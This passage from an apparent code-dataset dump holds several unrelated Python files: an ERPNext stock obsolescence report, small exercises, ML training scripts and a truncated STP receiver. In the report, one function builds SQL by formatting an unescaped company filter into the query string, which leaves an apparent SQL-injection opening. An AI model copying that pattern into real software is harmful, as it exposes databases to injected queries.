sle.valuation_rate,\n\t\t\tsle.company, sle.voucher_type, sle.qty_after_transaction, sle.stock_value_difference,\n\t\t\tsle.item_code as name, sle.voucher_no, sle.stock_value, sle.name\n\t\tfrom\n\t\t\t`tabStock Ledger Entry` sle force index (posting_sort_index)\n\t\twhere sle.docstatus < 2 %s %s\n\t\torder by sle.posting_date, sle.posting_time, sle.creation, sle.actual_qty\"\"\" % #nosec\n\t\t(item_conditions_sql, conditions), as_dict=1)\n\n\ndef get_conditions(filters):\n\tconditions = \"\"\n\t# if not filters.get(\"from_date\"):\n\t# \tfrappe.throw(_(\"'From Date' is required\"))\n\n\t# if filters.get(\"to_date\"):\n\t# \tconditions += \" and sle.posting_date <= %s\" % frappe.db.escape(filters.get(\"to_date\"))\n\t# else:\n\t# \tfrappe.throw(_(\"'To Date' is required\"))\n\n\tif filters.get(\"company\"):\n\t\tconditions += \" and sle.company = %s\" % frappe.db.escape(filters.get(\"company\"))\n\n\tif filters.get(\"warehouse\"):\n\t\twarehouse_details = 
frappe.db.get_value(\"Warehouse\",\n\t\t\tfilters.get(\"warehouse\"), [\"lft\", \"rgt\"], as_dict=1)\n\t\tif warehouse_details:\n\t\t\tconditions += \" and exists (select name from `tabWarehouse` wh \\\n\t\t\t\twhere wh.lft >= %s and wh.rgt <= %s and sle.warehouse = wh.name)\"%(warehouse_details.lft,\n\t\t\t\twarehouse_details.rgt)\n\n\n\t# if filters.get(\"warehouse_type\") and not filters.get(\"warehouse\"):\n\t# \tconditions += \" and exists (select name from `tabWarehouse` wh \\\n\t# \t\twhere wh.warehouse_type = '%s' and sle.warehouse = wh.name)\"%(filters.get(\"warehouse_type\"))\n\n\treturn conditions\n\n\ndef get_item_warehouse_map(filters, sle):\n\tiwb_map = {}\n\tfrom_date = getdate(filters.get(\"from_date\"))\n\tto_date = getdate(filters.get(\"to_date\"))\n\n\tfloat_precision = cint(frappe.db.get_default(\"float_precision\")) or 3\n\n\tfor d in sle:\n\t\tkey = (d.company, d.item_code, d.warehouse)\n\t\tif key not in iwb_map:\n\t\t\tiwb_map[key] = frappe._dict({\n\t\t\t\t\"opening_qty\": 0.0, \"opening_val\": 0.0,\n\t\t\t\t\"in_qty\": 0.0, \"in_val\": 0.0,\n\t\t\t\t\"out_qty\": 0.0, \"out_val\": 0.0,\n\t\t\t\t\"bal_qty\": 0.0, \"bal_val\": 0.0,\n\t\t\t\t\"val_rate\": 0.0\n\t\t\t})\n\n\t\tqty_dict = iwb_map[(d.company, d.item_code, d.warehouse)]\n\t\tif d.voucher_type == \"Stock Reconciliation\":\n\t\t\tqty_diff = flt(d.qty_after_transaction) - flt(qty_dict.bal_qty)\n\t\telse:\n\t\t\tqty_diff = flt(d.actual_qty)\n\n\t\tvalue_diff = flt(d.stock_value_difference)\n\t\t# if d.posting_date < from_date:\n\t\t# \tqty_dict.opening_qty += qty_diff\n\t\t# \tqty_dict.opening_val += value_diff\n\n\t\t# elif d.posting_date >= from_date and d.posting_date <= to_date:\n\t\t# \tif flt(qty_diff, float_precision) >= 0:\n\t\t# \t\tqty_dict.in_qty += qty_diff\n\t\t# \t\tqty_dict.in_val += value_diff\n\t\t# \telse:\n\t\t# \t\tqty_dict.out_qty += abs(qty_diff)\n\t\t# \t\tqty_dict.out_val += abs(value_diff)\n\t\tqty_dict.val_rate = d.valuation_rate\n\t\tqty_dict.bal_qty += qty_diff\n\t\tqty_dict.bal_val += value_diff\n\tiwb_map = filter_items_with_no_transactions(iwb_map, float_precision)\n\n\treturn iwb_map\n\n\ndef filter_items_with_no_transactions(iwb_map, float_precision):\n\tfor (company, item, warehouse) in sorted(iwb_map):\n\t\tqty_dict = iwb_map[(company, item, warehouse)]\n\n\t\tno_transactions = True\n\t\tfor key, val in iteritems(qty_dict):\n\t\t\tval = flt(val, float_precision)\n\t\t\tqty_dict[key] = val\n\t\t\tif key != \"val_rate\" and val:\n\t\t\t\tno_transactions = False\n\n\t\tif no_transactions:\n\t\t\tiwb_map.pop((company, item, warehouse))\n\n\treturn iwb_map\n\ndef get_item_details(items, sle, filters):\n\titem_details = {}\n\tif not items:\n\t\titems = list(set([d.item_code for d in sle]))\n\n\tif not items:\n\t\treturn item_details\n\n\tcf_field = cf_join = \"\"\n\tif filters.get(\"include_uom\"):\n\t\tcf_field = \", ucd.conversion_factor\"\n\t\tcf_join = \"left join `tabUOM Conversion Detail` ucd on ucd.parent=item.name and ucd.uom=%s\" \\\n\t\t\t% frappe.db.escape(filters.get(\"include_uom\"))\n\n\tres = frappe.db.sql(\"\"\"\n\t\tselect\n\t\t\titem.name, item.item_name, item.description, item.item_group, item.brand, item.stock_uom %s\n\t\tfrom\n\t\t\t`tabItem` item\n\t\t\t%s\n\t\twhere\n\t\t\titem.name in (%s)\n\t\"\"\" % (cf_field, cf_join, ','.join(['%s'] *len(items))), items, as_dict=1)\n\n\tfor item in res:\n\t\titem_details.setdefault(item.name, item)\n\n\tif filters.get('show_variant_attributes', 0) == 1:\n\t\tvariant_values = 
get_variant_values_for(list(item_details))\n\t\titem_details = {k: v.update(variant_values.get(k, {})) for k, v in iteritems(item_details)}\n\n\treturn item_details\n\ndef get_item_reorder_details(items):\n\titem_reorder_details = frappe._dict()\n\n\tif items:\n\t\titem_reorder_details = frappe.db.sql(\"\"\"\n\t\t\tselect parent, warehouse, warehouse_reorder_qty, warehouse_reorder_level\n\t\t\tfrom `tabItem Reorder`\n\t\t\twhere parent in ({0})\n\t\t\"\"\".format(', '.join([frappe.db.escape(i, percent=False) for i in items])), as_dict=1)\n\n\treturn dict((d.parent + d.warehouse, d) for d in item_reorder_details)\n\n\ndef get_items(filters):\n\tconditions = []\n\tif filters.get(\"item_code\"):\n\t\tconditions.append(\"item.name=%(item_code)s\")\n\n\titems = []\n\tif conditions:\n\t\titems = frappe.db.sql_list(\"\"\"select name from `tabItem` item where {}\"\"\"\n\t\t\t.format(\" and \".join(conditions)), filters)\n\treturn items\n\ndef stock_qty_before_some_month(filters):\n\tmonths_list = [2, 3, 6, 12, 24]\n\tmonths_date = []\n\t# months_date.append(getdate(today()))\n\tfor row in months_list:\n\t\t_date = date.today() + relativedelta(months=-row)\n\t\tmonths_date.append(getdate(_date))\n\n\tnew_list = {}\n\tstock_dict = {}\n\tfor idx, v in enumerate(months_date):\n\t\tmonth_len = len(months_date)-1\n\t\tif month_len != idx:\n\t\t\tsle_qty = frappe.db.sql(\"\"\"select sle.item_code, sle.warehouse, sle.posting_date, ABS(sum(sle.actual_qty) - sum(sle.qty_after_transaction)) as bal_qty, sle.company from `tabStock Ledger Entry` sle where sle.company='{0}' and sle.posting_date BETWEEN '{1}' and '{2}' GROUP BY sle.item_code, sle.warehouse\"\"\".format(filters.get(\"company\"), months_date[idx+1], v), as_dict=1)\n\t\telse:\n\t\t\tsle_qty = frappe.db.sql(\"\"\"select distinct sle.item_code, sle.warehouse, sle.posting_date, ABS(sum(sle.actual_qty) - sum(sle.qty_after_transaction)) as bal_qty, sle.company from `tabStock Ledger Entry` sle where sle.company='{0}' and sle.posting_date < '{1}' GROUP BY sle.item_code, sle.warehouse\"\"\".format(filters.get(\"company\"), v), as_dict=1)\n\t\t\n\t\tfor row in sle_qty:\n\t\t\tif row.get(\"item_code\") in stock_dict:\n\t\t\t\td=stock_dict[row.get(\"item_code\")]\n\t\t\t\td[months_list[idx]]=row.get(\"bal_qty\")\n\t\t\t\tstock_dict[row.get(\"item_code\")]=d\n\t\t\telse:\n\t\t\t\trow[months_list[idx]]=row.get(\"bal_qty\")\n\t\t\t\tstock_dict[row.get(\"item_code\")] = row\n\n\treturn stock_dict\n\ndef get_columns():\n\treturn\t[\n\t\t{\n\t\t\t\"label\": _(\"Branch\"),\n\t\t\t\"fieldname\": \"company\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Warehouse\"),\n\t\t\t\"fieldname\": \"warehouse\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Book Code\"),\n\t\t\t\"fieldname\": \"item_code\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Book Description\"),\n\t\t\t\"fieldname\": \"description\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Last Stock Updated Date\"),\n\t\t\t\"fieldname\": \"last_stock_updated_date\",\n\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"Available Stock\"),\n\t\t\t\"fieldname\": \"bal_qty\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"0-30 Days\"),\n\t\t\t\"fieldname\": \"bal_qty\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": 
_(\"60 Days\"),\n\t\t\t\"fieldname\": \"days_60\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"90 Days\"),\n\t\t\t\"fieldname\": \"days_90\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"180 Days\"),\n\t\t\t\"fieldname\": \"days_180\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\"1 Year\"),\n\t\t\t\"fieldname\": \"year_1\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 120\n\t\t},\n\t\t{\n\t\t\t\"label\": _(\">2 Year\"),\n\t\t\t\"fieldname\": \"year_2\",\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"width\": 150\n\t\t}\n\t]","repo_name":"indictranstech/BBT-I2E","sub_path":"bbt_bpm/bbt_bpm/report/obsolescence_report/obsolescence_report.py","file_name":"obsolescence_report.py","file_ext":"py","file_size_in_byte":10901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23768332326","text":"import os\nimport unittest\nfrom datetime import datetime, date\nfrom pathlib import Path\n\n# from auto_terrarium_proj.Reading import Reading\nfrom .ReadingsDB import ReadingsDBController, DEFAULT_DB_FILE\nfrom web_monitor.models import Reading\n\ncurtime = datetime.now()\ntest_reading = Reading(curtime, 72, 44)\n\n\nclass TestReadingsDB(unittest.TestCase):\n\n def setUp(self):\n path = Path(DEFAULT_DB_FILE)\n if Path.exists(path):\n os.remove(DEFAULT_DB_FILE)\n\n def test_get_latest_reading(self):\n ReadingsDBController.create_readings_table('test.sqlite', reinit=True)\n db = ReadingsDBController('test.sqlite')\n\n db.write(test_reading)\n reading = db.get_latest_reading()\n\n self.assertEqual(reading.time, test_reading.time)\n self.assertEqual(reading.temperature, test_reading.temperature)\n self.assertEqual(reading.humidity, test_reading.humidity)\n\n ReadingsDBController.drop_readings_table('test.sqlite')\n\n def test_record_good_reading(self):\n ReadingsDBController.create_readings_table('test.sqlite', reinit=True)\n db = ReadingsDBController()\n\n db.write(test_reading)\n ReadingsDBController.drop_readings_table()\n\n\nclass TestReading(unittest.TestCase):\n\n def test_bad_time(self):\n self.skipTest(\"not implemented yet\")\n never = date.max\n reading = Reading(never, 72, 44)\n self.assertIsNone(reading, \"class Reading init accepted bad temp value\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tv-deusen/auto-terrarium","sub_path":"auto_terrarium/database/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40493283498","text":"##### Temperature Class #####\n\n# Create a Temperature class whose instances all contain a kelvin attribute. This class should also \n# contain two class attributes named min_temperature and max_temperature which can be modified by \n# calling the respective class methods named update_min_temperature and update_max_temperature.\n\n# min_temperature must always be less than max_temperature and each instances' kelvin attribute \n# must be between min_temperature and max_temperature, inclusively. 
Any instantiation or method \n# call that breaks the outlined constraints should raise an Exception.\n\n# Note: min_temperature should be initialized as 0 and max_temperature should be initialized as 1000.\n\n# See below for an example.\n\n# >>> t1 = Temperature(260)\n# >>> Temperature.update_max_temperature(270)\n# >>> Temperature.update_min_temperature(680)\n# Exception: Invalid temperature.\n# >>> t2 = Temperature(280)\n# Exception: Invalid temperature.\n# >>> Temperature.update_min_temperature(100)\n# >>> t3 = Temperature(120)\n# >>> Temperature.update_max_temperature(90)\n# Exception: Invalid temperature.\n\nclass Temperature:\n min_temperature = 0\n max_temperature = 1000\n\n def __init__(self, kelvin):\n if kelvin > self.max_temperature or kelvin < self.min_temperature:\n raise Exception(\"Invalid temperature.\")\n\n self.kelvin = kelvin\n\n @classmethod\n def update_min_temperature(cls, kelvin):\n if kelvin > cls.max_temperature:\n raise Exception(\"Invalid temperature.\")\n\n cls.min_temperature = kelvin\n\n @classmethod\n def update_max_temperature(cls, kelvin):\n if kelvin < cls.min_temperature:\n raise Exception(\"Invalid temperature.\")\n\n cls.max_temperature = kelvin","repo_name":"pochiman/ProgrammingExpert","sub_path":"03_Object-Oriented_Programming/05_Class_Methods_And_Attributes/question_6.py","file_name":"question_6.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34720825948","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass assem_code_UI(QMainWindow):\n def __init__(self):\n super().__init__()\n\n def init_UI(self, codes):\n self.setWindowTitle('汇编代码')\n self.resize(640, 640)\n widget = QWidget()\n self.setCentralWidget(widget)\n self.setWindowIcon(QIcon('./Img/logo.png'))\n layout = QHBoxLayout()\n text = QTextBrowser()\n layout.addWidget(text)\n widget.setLayout(layout)\n text.setFont(QFont('微软雅黑', 11))\n text.setLineWrapMode(0)\n text.setText(codes)\n","repo_name":"ColorCJY/Complier","sub_path":"assem_code_UI.py","file_name":"assem_code_UI.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23337265204","text":"# https://leetcode.com/problems/two-sum/\n\n# use dictionary to store a value and the index of each element in the list of int\n# O(n) time and O(n) space\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n for index, num in enumerate(nums):\n complement = target - num\n if complement in d:\n return [d[complement], index]\n d[num]=index","repo_name":"WayOfOne/leetcode_practice","sub_path":"2023/Week_1/Arrays_and_hashing/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39950471088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# python/hilbert_curve.py Author \"Nathan Wycoff \" Date 03.27.2019\n\n## Initialize a design along a hilbert curve. 
\n\nimport matplotlib.pyplot as plt\nplt.ion()\nfrom hilbertcurve.hilbertcurve import HilbertCurve\nimport numpy as np\n\ndef hc_design(N, P):\n \"\"\"\n Design along a Hilbert Curve in the P dimensional unit box with N many points.\n \"\"\"\n gamma = int(np.ceil(np.log2(N+1) / P))\n hilbert_curve = HilbertCurve(gamma, P)\n\n n_verts = 2**(gamma*P) - 1\n cube_slen = float(np.power(2, gamma))\n\n hc = hilbert_curve.coordinates_from_distance\n\n design = np.empty([N,P])\n for n in range(N):\n ind = float(n * n_verts) / float(N)\n xb = np.array(hc(int(np.floor(ind)))) / cube_slen \n xa = np.array(hc(int(np.ceil(ind)))) / cube_slen\n conv_coef = ind - np.floor(ind)\n design[n,:] = (1.0 - conv_coef) * xb + conv_coef * xa\n\n return(design)\n","repo_name":"NathanWycoff/gpnn","sub_path":"python/hilbert_curve.py","file_name":"hilbert_curve.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8497490152","text":"from DQN import DQN, DoubleDQN\n\n\nfrom utils.buffers import PreprocessAtari, FrameBuffer\nimport gym\nimport tensorflow as tf\n\nenv = gym.make(\"BreakoutDeterministic-v4\")\n\nenv = PreprocessAtari(env)\n\nenv = FrameBuffer(env)\n\ntf.reset_default_graph()\n\nsess = tf.InteractiveSession()\n\n# agent = DQN(env, sess, eps=0.85, max_buffer_size=100000, gamma=0.99,\n# lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True,\n# eps_decay=0.9995)\n\n# agent = NstepDQN(env, sess, eps=0.85, max_buffer_size=100000, gamma=0.99,\n# lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True,\n# eps_decay=0.9999,N=4)\n\n\nagent = DoubleDQN(env, sess, eps=0.5, max_buffer_size=100000, gamma=0.99,\n lr=1e-4, tau=0.01, batch_size=32, use_conv_net=True, eps_decay=0.9999)\n\nsess.run(tf.global_variables_initializer())\n\nagent.run_episodes(10000, verbosity=1, eval=True, eval_freq=10, n_interact_2_evaluate=3)\n\nagent.close()\n\n\n","repo_name":"whiterabbitfollow/reinforcement_learning","sub_path":"DQN/runs/Atari_BreakoutDetermenistic.py","file_name":"Atari_BreakoutDetermenistic.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42483824403","text":"\"\"\"\nRoman numerals come from the ancient Roman numbering system. They are based on specific letters of the alphabet which\nare combined to signify the sum (or, in some cases, the difference) of their values. The first ten Roman numerals are:\n\nI, II, III, IV, V, VI, VII, VIII, IX, and X.\n\nThe Roman numeral system is decimal based, but not directly positional and does not include a zero. 
Roman numerals are\nbased on combinations of these seven symbols:\nNumeral\tValue\nI\t1 (unus)\nV\t5 (quinque)\nX\t10 (decem)\nL\t50 (quinquaginta)\nC\t100 (centum)\nD\t500 (quingenti)\nM\t1,000 (mille)\n\nMore additional information about Roman numerals can be found on the Wikipedia article.\n\nFor this task, you should return a Roman numeral using the specified integer value ranging from 1 to 3999.\n\nInput: A number as an integer.\n\nOutput: The Roman numeral as a string.\n\"\"\"\n\n\ndef roman_decode(number: int, first: str, second: str, third: str) -> str:\n main = ''\n additional = ''\n if number > 8:\n main = third\n additional = first\n elif 3 < number < 9:\n main = second\n additional = first\n elif number < 4:\n main = ''\n additional = first\n if number == 10 or number == 5:\n return main\n elif number == 9 or number == 4:\n return additional + main\n elif number == 8 or number == 3:\n return main + additional + additional + additional\n elif number == 7 or number == 2:\n return main + additional + additional\n elif number == 6 or number == 1:\n return main + additional\n\n\ndef checkio(data: int) -> str:\n result = ''\n if data // 1000:\n result += roman_decode(data // 1000, 'M', 'Z', 'Y')\n if data % 1000 // 100:\n result += roman_decode(data % 1000 // 100, 'C', 'D', 'M')\n if data % 100 // 10:\n result += roman_decode(data % 100 // 10, 'X', 'L', 'C')\n if data % 10:\n result += roman_decode(data % 10, 'I', 'V', 'X')\n return result\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(6) == 'VI', '6'\n assert checkio(76) == 'LXXVI', '76'\n assert checkio(499) == 'CDXCIX', '499'\n assert checkio(3888) == 'MMMDCCCLXXXVIII', '3888'\n print('Done! Go Check!')\n","repo_name":"DorogAD/checkio","sub_path":"ice_base/task12_roman_numerals.py","file_name":"task12_roman_numerals.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42262569051","text":"import os\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import layers\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = \"1\"\n\nif __name__ == '__main__':\n ### 4.5 张量的典型应用\n ##### 4.5.1 标量\n ##### 4.5.2 向量\n ##### 4.5.3 矩阵\n ##### 4.5.4 三维张量\n ##### 4.5.5 四维张量\n\n ##### 4.5.1 标量\n # 是一个简单的数字,维度数为; 0,shape; 为[]\n # 模拟MSE误差计算\n out = tf.random.uniform([4, 10])\n y = tf.constant([2, 3, 2, 0])\n y = tf.one_hot(y, depth=10)\n loss = tf.keras.losses.mse(y, out)\n loss = tf.reduce_mean(loss)\n # print(loss)\n\n ##### 4.5.2 向量\n ##### 4.5.3 矩阵\n ##### 4.5.4 三维张量\n # 三维的张量一个典型应用是表示序列信号,它的格式是; 𝑿 = [𝑏, sequence len, feature len];\n # 其中𝑏表示序列信号的数量,sequence; len; 表示序列信号在时间维度上的采样点数或步数, feature;\n # len; 表示每个点的特征长度。\n\n # num_words=单词按照它们出现的频率(在训练集中)进行排序,并且只保留最常见的单词。\n # (x_train, y_train), (x_test, y_test) \\\n # = keras.datasets.imdb.load_data(num_words=10000)\n # print(x_train.shape)\n # print(y_train.shape)\n # x_train = keras.preprocessing.sequence.pad_sequences(x_train, maxlen=80)\n # print(x_train.shape)\n # embedding = layers.Embedding(10000, 100)\n # out = embedding(x_train)\n # shape; 变为[25000, 80, 100]\n # 其中25000表示句子个数,80表示每个句子共80个单词,其中 100 表示每个单词编码为长度是 100 的向量\n # print(out.shape)\n ##### 4.5.5 四维张量\n # [𝑏, ℎ,, 𝑐]其中𝑏表示输入样本的数量,ℎ / 分别表示特征图的高 / 宽,𝑐表示特征图的通道数\n # 模拟创建32*32的彩色图片输入,个数为4\n x = tf.random.normal([4, 32, 32, 3])\n # 创建卷积神经网络\n layer = layers.Conv2D(16, kernel_size=3)\n out = layer(x)\n print(out.shape)\n 
print(layer.kernel.shape)\n","repo_name":"TimVan1596/ACM-ICPC","sub_path":"python/deep_learning/TensorFlow/第4章 TensorFlow基础/4.5 张量的典型应用.py","file_name":"4.5 张量的典型应用.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6083726256","text":"\nimport tensorflow as tf\nimport os\nimport numpy as np\nfrom .configs import *\n\nargs = dotdict({\n 'learning_rate':0.001,\n 'epochs':10,\n 'batch_size':32,\n 'momentum': 0.9,\n 'resnet_blocks': 1,\n})\n\nclass NeuralNetwork(object):\n #Represent Policy and value head\n\n def __init__(self, gas_network):\n self.row, self.cols = gas_network.get_state_dimension()\n self.action_size = gas_network.get_action_size()\n\n self.pi = None\n self.v = None\n\n self.graph = tf.Graph()\n with self.graph.as_default():\n self.states = tf.placeholder(tf.float32,\n shape = [None,self.row])\n self.training = tf.placeholder(tf.bool)\n\n #Input_Layer\n input_layer = tf.reshape(self.states,\n [-1, self.row, 1, 1])\n\n #Convolutional Block\n conv1 = tf.layers.conv2d(\n inputs = input_layer,\n filters = 256,\n kernel_size = [3,3],\n padding = \"same\",\n strides = 1\n )\n #Batch Normalization\n batch_norm1 = tf.layers.batch_normalization(\n inputs = conv1,\n training = self.training)\n relu1 = tf.nn.relu(batch_norm1)\n\n resnet_in_out = relu1\n\n #Residual Tower\n for i in range(args.resnet_blocks):\n #Residual Block\n conv2 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 256,\n kernel_size = [3,3],\n padding = \"same\",\n strides = 1)\n batch_norm2 = tf.layers.batch_normalization(\n inputs = conv2,\n training = self.training)\n relu2 = tf.nn.relu(batch_norm2)\n\n conv3 = tf.layers.conv2d(\n inputs = relu2,\n filters = 256,\n kernel_size = [3, 3],\n padding = \"same\",\n strides = 1)\n batch_norm3 = tf.layers.batch_normalization(\n inputs = conv3,\n training = self.training)\n resnet_skip = tf.add(batch_norm3, resnet_in_out)\n resnet_in_out = tf.nn.relu(resnet_skip)\n\n #Policy Head\n conv4 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 2,\n kernel_size = [1, 1],\n padding = \"same\",\n strides = 1)\n batch_norm4 = tf.layers.batch_normalization(\n inputs = conv4,\n training = self.training)\n relu4 = tf.nn.relu(batch_norm4)\n\n relu4_flat = tf.reshape(relu4, [-1, self.row * 2])\n\n dense_pi = tf.layers.dense(\n inputs = relu4_flat,\n units = self.action_size)\n\n self.pi = tf.nn.softmax(dense_pi)\n\n #value Head\n conv5 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 1,\n kernel_size = [1,1],\n padding = \"same\",\n strides = 1)\n batch_norm5 = tf.layers.batch_normalization(\n inputs = conv5,\n training = self.training)\n relu5 = tf.nn.relu(batch_norm5)\n\n relu5_flat = tf.reshape(relu5, [-1, self.action_size])\n\n dense1 = tf.layers.dense(\n inputs = relu5_flat,\n units = 256)\n relu6 = tf.nn.relu(dense1)\n\n dense2 = tf.layers.dense(\n inputs = relu6,\n units = 1)\n\n self.v = tf.nn.tanh(dense2)\n\n #Loss Function\n self.train_pis = tf.placeholder(tf.float32,\n shape = [None, self.action_size])\n self.train_vs = tf.placeholder(tf.float32, shape = [None])\n\n self.loss_pi = tf.losses.softmax_cross_entropy(self.train_pis, self.pi)\n self.loss_v = tf.losses.mean_squared_error(self.train_vs,\n tf.reshape(self.v, shape = [-1, ]))\n\n self.total_loss = self.loss_pi + self.loss_v\n\n #Stochastic gradient descent with momentum\n optimizer = tf.train.MomentumOptimizer(\n learning_rate = args.learning_rate,\n momentum = args.momentum,\n use_nesterov = 
False)\n self.train_op = optimizer.minimize(self.total_loss)\n\n #Saver for writing training checkpoints\n self.saver = tf.train.Saver()\n\n #Session for running operations on Graph\n self.sess = tf.Session()\n\n self.sess.run(tf.global_variables_initializer()) #Session Initialization\n\n\nclass NeuralNetworkWrapper(object):\n\n def __init__(self, gas_network):\n self.gas_network = gas_network\n self.net = NeuralNetwork(self.gas_network)\n self.sess = self.net.sess\n\n #Predict the value of action probability and value\n def policy_value(self, state):\n\n state = state[np.newaxis, :]\n pi,v = self.sess.run([self.net.pi, self.net.v],\n feed_dict = {self.net.states: state,\n self.net.training: False})\n return pi[0], v[0][0]\n\n\n def train(self, training_data):\n #Trains network using states, pis and vs from self-play games\n\n print(\"\\nTraining the network\\n\")\n\n for epoch in range(args.epochs):\n\n print(\"Epoch\", epoch+1)\n examples_num = len(training_data)\n\n for i in range(0, examples_num, args.batch_size):\n states, pis, vs = map(list,\n zip(*training_data[i:i+args.batch_size]))\n\n feed_dict = {self.net.states: states,\n self.net.train_pis: pis,\n self.net.train_vs: vs,\n self.net.training: True}\n\n self.sess.run(self.net.train_op,\n feed_dict = feed_dict)\n\n pi_loss, v_loss = self.sess.run(\n [self.net.loss_pi, self.net.loss_v],\n feed_dict = feed_dict)\n\n # Record pi and v loss to a file.\n if configs.record_loss:\n # Create directory if it doesn't exist.\n if not os.path.exists(configs.model_dir):\n os.mkdir(configs.model_dir)\n\n file_path = configs.model_dir + configs.loss_file\n\n with open(file_path, 'a') as loss_file:\n loss_file.write('%f|%f\\n' % (pi_loss, v_loss))\n #Save the model\n def save_model(self, filename = \"current_model\"):\n if not os.path.exists(configs.model_dir):\n os.mkdir(configs.model_dir)\n\n file_path = configs.model_dir + filename\n #print(\"Saving model:\", filename, \"to\", configs.model_dir)\n self.net.saver.save(self.sess, file_path)\n #Load the model\n def load_model(self, filename = \"current_model\"):\n file_path = configs.model_dir + filename\n #print(\"Loading model:\", filename, \"from\", configs.model_dir)\n self.net.saver.restore(self.sess, file_path)\n","repo_name":"demogorgi/MIP_based_gas_simulator","sub_path":"gurobi-version/ai_part/neural_network_architecture.py","file_name":"neural_network_architecture.py","file_ext":"py","file_size_in_byte":7419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72022870802","text":"'''\nCOMP3331 18s2 ASS\n-----\nz5125769\n'''\n\nimport socket\nimport sys\n\nfrom public import STP_STA, STPLogger, STPPacker\n\nONE_BYTE = b'0'\n\n\nclass STPReceiverLogger(STPLogger):\n '''\n log component\n '''\n def __init__(self):\n super().__init__(\"Receiver_log.txt\")\n counter = {\n 'all_seg_rcv': 0,\n 'dat_seg_rcv': 0,\n 'crp_seg_rcv': 0,\n 'dup_seg_rcv': 0,\n 'dup_ack_snt': 0\n }\n super().init_counter(counter)\n\n def counter_hook(self, event, opts):\n ''' override function in super class '''\n e_cls = event[0:3]\n e_opt = event[4:]\n dat_b = opts[1]\n if e_cls == \"rcv\":\n self._counter['all_seg_rcv'] += 1\n if dat_b:\n self._counter['dat_seg_rcv'] += 1\n if e_opt == \"corr\":\n self._counter['crp_seg_rcv'] += 1\n elif e_opt == \"dup\" and dat_b:\n self._counter['dup_seg_rcv'] += 1\n else:\n pass\n elif e_cls == \"snd\" and e_opt == \"DA\":\n self._counter['dup_ack_snt'] += 1\n else:\n pass\n\n def summarize_hook(self, info):\n ''' override 
function in super class '''\n dat_len_rcv = info\n with open(self._f_name, 'a') as openf:\n openf.write(f\"============================================\\n\")\n openf.write(f\"Amount of Data Received (bytes) {dat_len_rcv:>10}\\n\")\n openf.write(f\"Total segments received {self._counter['all_seg_rcv']:>10}\\n\")\n openf.write(f\"Data segments received {self._counter['dat_seg_rcv']:>10}\\n\")\n openf.write(f\"Data Segments with bit errors {self._counter['crp_seg_rcv']:>10}\\n\")\n openf.write(f\"Duplicate data segments received {self._counter['dup_seg_rcv']:>10}\\n\")\n openf.write(f\"Duplicate ACKs sent {self._counter['dup_ack_snt']:>10}\\n\")\n openf.write(f\"============================================\\n\")\n\n\nclass STPReceiver:\n '''\n STP protocol, implementation on receiver side\n '''\n def __init__(self, sport):\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._socket.bind(('', sport))\n self._packer = 